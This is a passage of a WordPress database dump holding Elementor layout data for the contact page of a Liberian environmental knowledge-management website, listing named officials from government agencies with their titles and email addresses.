href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24590,3631,'_elementor_edit_mode','builder'),(24591,3631,'_elementor_template_type','wp-page'),(24592,3631,'_elementor_version','3.0.16'),(24593,3631,'_wp_page_template','default'),(24594,3631,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":